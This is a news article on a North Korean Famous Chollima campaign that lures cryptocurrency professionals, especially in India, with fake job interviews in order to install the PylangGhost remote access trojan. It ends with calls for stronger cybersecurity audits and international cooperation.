tl;dr
North Korean hackers linked to the group Famous Chollima are targeting cryptocurrency professionals, especially in India, with fake job interviews to steal data and deploy malware called PylangGhost. This Python-based remote access trojan steals credentials from over 80 browser extensions, including...
North Korean hackers affiliated with the Famous Chollima group have intensified a sophisticated campaign targeting cryptocurrency professionals, particularly in India. They employ elaborate fake job interviews to steal sensitive data and deploy a new Python-based remote access trojan (RAT) called PylangGhost. This malware stealthily extracts credentials from over 80 browser extensions, including widely used crypto wallets and password managers.
The operation begins with attackers impersonating reputable companies such as Coinbase, Robinhood, and Uniswap via fraudulent job websites. Victims are funneled through skill tests and video interviews, during which they are tricked into running malicious commands disguised as video driver installations. This clever subterfuge grants hackers persistent access to the victims' systems, enabling them to execute remote commands and harvest data.
Experts emphasize the urgent need for India to enforce mandatory cybersecurity audits for blockchain firms and heighten awareness about these schemes. Calls for stronger legal frameworks and international cooperation also grow louder as such cybercrimes cross borders. The Ministry of Electronics and IT (MEITY), CERT-In, and national cyber agencies must collaborate globally to curb these sophisticated threats.
This campaign is part of North Korea’s broader crypto-focused cybercrime strategy, which includes high-profile attacks by groups like Lazarus. Since 2023, North Korean hackers have leveraged fake companies and job portals on multiple platforms to recruit and attack individuals. While PylangGhost targets Windows users, a comparable malware variant named GolangGhost focuses on macOS, with Linux systems unaffected.
In 2024 alone, North Korean-backed groups have stolen at least $659 million in cryptocurrencies, executing elaborate hacks such as the $50 million Radiant Capital breach initiated through malware-laden PDFs. A notable prevention success was achieved by crypto exchange Kraken, which foiled a hacking attempt by detecting and exposing a North Korean operative during an IT job application process.
The rising trend of hiring-based cyberattacks highlights the evolving nature of threats in the crypto industry. Stakeholders must remain vigilant, emphasizing cybersecurity hygiene and international legal action to protect digital assets and the professionals behind them. Have you encountered suspicious job offers in the crypto space? What measures do you think firms should prioritize to defend against such covert cyber threats?